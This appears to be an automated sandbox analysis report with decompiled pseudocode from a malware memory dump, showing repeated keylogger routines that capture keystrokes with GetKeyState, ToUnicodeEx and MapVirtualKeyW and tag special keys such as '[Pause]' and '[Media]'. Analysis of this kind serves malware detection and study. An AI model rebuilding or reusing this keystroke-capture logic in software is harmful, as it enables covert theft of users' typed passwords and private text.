0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F17], xrefs: 00C85B28

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85CE0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CE0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Previous Track]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85ce0
0x00c85ce7
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Previous Track], xrefs: 00C85CE2
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A49, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A49(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Context Menu]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a49
0x00c85a50
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Context Menu], xrefs: 00C85A4B
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D35, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D35(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Pause]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d35
0x00c85d3c
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Pause], xrefs: 00C85D37

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C858A0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858A0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad *]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c858a0
0x00c858a7
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad *], xrefs: 00C858A2

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C7A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C7A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Media]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c7a
0x00c85c81
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

